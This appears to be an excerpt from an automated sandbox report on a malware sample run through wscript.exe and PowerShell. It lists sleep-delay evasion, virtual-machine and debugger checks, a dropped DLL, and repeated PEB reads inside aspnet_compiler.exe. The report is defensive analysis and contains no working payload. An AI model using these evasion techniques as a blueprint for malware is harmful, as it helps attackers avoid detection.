Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7593 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2088 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3776 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5962 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6068 Thread sleep count: 7593 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6068 Thread sleep count: 2088 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4876 Thread sleep time: -16602069666338586s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5376 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000003.00000002.2242163202.0000000004777000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000007.00000002.2232374041.00000000050C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000007.00000002.2232374041.00000000050C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\M
Source: powershell.exe, 00000003.00000002.2242163202.0000000004777000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2247866665.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2247720728.0000000007D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.2247866665.0000000007DB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW=KzdN
Source: powershell.exe, 00000003.00000002.2242163202.0000000004777000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000008.00000002.2510668182.0000000007ACA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132D1C0 rdtsc 12_2_0132D1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_00417883 LdrLoadDll, 12_2_00417883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012E0124 mov eax, dword ptr fs:[00000030h] 12_2_012E0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B1131 mov eax, dword ptr fs:[00000030h] 12_2_012B1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B1131 mov eax, dword ptr fs:[00000030h] 12_2_012B1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AB136 mov eax, dword ptr fs:[00000030h] 12_2_012AB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AB136 mov eax, dword ptr fs:[00000030h] 12_2_012AB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AB136 mov eax, dword ptr fs:[00000030h] 12_2_012AB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AB136 mov eax, dword ptr fs:[00000030h] 12_2_012AB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01370115 mov eax, dword ptr fs:[00000030h] 12_2_01370115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135A118 mov ecx, dword ptr fs:[00000030h] 12_2_0135A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135A118 mov eax, dword ptr fs:[00000030h] 12_2_0135A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135A118 mov eax, dword ptr fs:[00000030h] 12_2_0135A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135A118 mov eax, dword ptr fs:[00000030h] 12_2_0135A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01349179 mov eax, dword ptr fs:[00000030h] 12_2_01349179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AF172 mov eax, dword ptr fs:[00000030h] 12_2_012AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012A9148 mov eax, dword ptr fs:[00000030h] 12_2_012A9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012A9148 mov eax, dword ptr fs:[00000030h] 12_2_012A9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012A9148 mov eax, dword ptr fs:[00000030h] 12_2_012A9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012A9148 mov eax, dword ptr fs:[00000030h] 12_2_012A9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01385152 mov eax, dword ptr fs:[00000030h] 12_2_01385152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01348158 mov eax, dword ptr fs:[00000030h] 12_2_01348158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01344144 mov eax, dword ptr fs:[00000030h] 12_2_01344144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01344144 mov eax, dword ptr fs:[00000030h] 12_2_01344144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01344144 mov ecx, dword ptr fs:[00000030h] 12_2_01344144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01344144 mov eax, dword ptr fs:[00000030h] 12_2_01344144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01344144 mov eax, dword ptr fs:[00000030h] 12_2_01344144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B7152 mov eax, dword ptr fs:[00000030h] 12_2_012B7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AC156 mov eax, dword ptr fs:[00000030h] 12_2_012AC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B6154 mov eax, dword ptr fs:[00000030h] 12_2_012B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B6154 mov eax, dword ptr fs:[00000030h] 12_2_012B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013611A4 mov eax, dword ptr fs:[00000030h] 12_2_013611A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013611A4 mov eax, dword ptr fs:[00000030h] 12_2_013611A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013611A4 mov eax, dword ptr fs:[00000030h] 12_2_013611A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013611A4 mov eax, dword ptr fs:[00000030h] 12_2_013611A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CB1B0 mov eax, dword ptr fs:[00000030h] 12_2_012CB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01307190 mov eax, dword ptr fs:[00000030h] 12_2_01307190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F0185 mov eax, dword ptr fs:[00000030h] 12_2_012F0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0133019F mov eax, dword ptr fs:[00000030h] 12_2_0133019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0133019F mov eax, dword ptr fs:[00000030h] 12_2_0133019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0133019F mov eax, dword ptr fs:[00000030h] 12_2_0133019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0133019F mov eax, dword ptr fs:[00000030h] 12_2_0133019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AA197 mov eax, dword ptr fs:[00000030h] 12_2_012AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AA197 mov eax, dword ptr fs:[00000030h] 12_2_012AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AA197 mov eax, dword ptr fs:[00000030h] 12_2_012AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0136C188 mov eax, dword ptr fs:[00000030h] 12_2_0136C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0136C188 mov eax, dword ptr fs:[00000030h] 12_2_0136C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D51EF mov eax, dword ptr fs:[00000030h] 12_2_012D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B51ED mov eax, dword ptr fs:[00000030h] 12_2_012B51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013571F9 mov esi, dword ptr fs:[00000030h] 12_2_013571F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012E01F8 mov eax, dword ptr fs:[00000030h] 12_2_012E01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013861E5 mov eax, dword ptr fs:[00000030h] 12_2_013861E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0132E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0132E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132E1D0 mov ecx, dword ptr fs:[00000030h] 12_2_0132E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0132E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0132E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013851CB mov eax, dword ptr fs:[00000030h] 12_2_013851CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013761C3 mov eax, dword ptr fs:[00000030h] 12_2_013761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013761C3 mov eax, dword ptr fs:[00000030h] 12_2_013761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012ED1D0 mov eax, dword ptr fs:[00000030h] 12_2_012ED1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012ED1D0 mov ecx, dword ptr fs:[00000030h] 12_2_012ED1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137903E mov eax, dword ptr fs:[00000030h] 12_2_0137903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137903E mov eax, dword ptr fs:[00000030h] 12_2_0137903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137903E mov eax, dword ptr fs:[00000030h] 12_2_0137903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0137903E mov eax, dword ptr fs:[00000030h] 12_2_0137903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AA020 mov eax, dword ptr fs:[00000030h] 12_2_012AA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AC020 mov eax, dword ptr fs:[00000030h] 12_2_012AC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01334000 mov ecx, dword ptr fs:[00000030h] 12_2_01334000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CE016 mov eax, dword ptr fs:[00000030h] 12_2_012CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CE016 mov eax, dword ptr fs:[00000030h] 12_2_012CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CE016 mov eax, dword ptr fs:[00000030h] 12_2_012CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012CE016 mov eax, dword ptr fs:[00000030h] 12_2_012CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0132D070 mov ecx, dword ptr fs:[00000030h] 12_2_0132D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01385060 mov eax, dword ptr fs:[00000030h] 12_2_01385060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov ecx, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C1070 mov eax, dword ptr fs:[00000030h] 12_2_012C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0133106E mov eax, dword ptr fs:[00000030h] 12_2_0133106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DC073 mov eax, dword ptr fs:[00000030h] 12_2_012DC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01336050 mov eax, dword ptr fs:[00000030h] 12_2_01336050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135705E mov ebx, dword ptr fs:[00000030h] 12_2_0135705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0135705E mov eax, dword ptr fs:[00000030h] 12_2_0135705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B2050 mov eax, dword ptr fs:[00000030h] 12_2_012B2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DB052 mov eax, dword ptr fs:[00000030h] 12_2_012DB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013760B8 mov eax, dword ptr fs:[00000030h] 12_2_013760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013760B8 mov ecx, dword ptr fs:[00000030h] 12_2_013760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013480A8 mov eax, dword ptr fs:[00000030h] 12_2_013480A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B208A mov eax, dword ptr fs:[00000030h] 12_2_012B208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AD08D mov eax, dword ptr fs:[00000030h] 12_2_012AD08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012E909C mov eax, dword ptr fs:[00000030h] 12_2_012E909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0133D080 mov eax, dword ptr fs:[00000030h] 12_2_0133D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_0133D080 mov eax, dword ptr fs:[00000030h] 12_2_0133D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B5096 mov eax, dword ptr fs:[00000030h] 12_2_012B5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DD090 mov eax, dword ptr fs:[00000030h] 12_2_012DD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012DD090 mov eax, dword ptr fs:[00000030h] 12_2_012DD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012B80E9 mov eax, dword ptr fs:[00000030h] 12_2_012B80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D50E4 mov eax, dword ptr fs:[00000030h] 12_2_012D50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012D50E4 mov ecx, dword ptr fs:[00000030h] 12_2_012D50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AA0E3 mov ecx, dword ptr fs:[00000030h] 12_2_012AA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013360E0 mov eax, dword ptr fs:[00000030h] 12_2_013360E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012AC0F0 mov eax, dword ptr fs:[00000030h] 12_2_012AC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012F20F0 mov ecx, dword ptr fs:[00000030h] 12_2_012F20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_013850D9 mov eax, dword ptr fs:[00000030h] 12_2_013850D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C70C0 mov eax, dword ptr fs:[00000030h] 12_2_012C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C70C0 mov ecx, dword ptr fs:[00000030h] 12_2_012C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C70C0 mov ecx, dword ptr fs:[00000030h] 12_2_012C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C70C0 mov eax, dword ptr fs:[00000030h] 12_2_012C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C70C0 mov ecx, dword ptr fs:[00000030h] 12_2_012C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012C70C0 mov ecx, dword ptr fs:[00000030h] 12_2_012C70C0
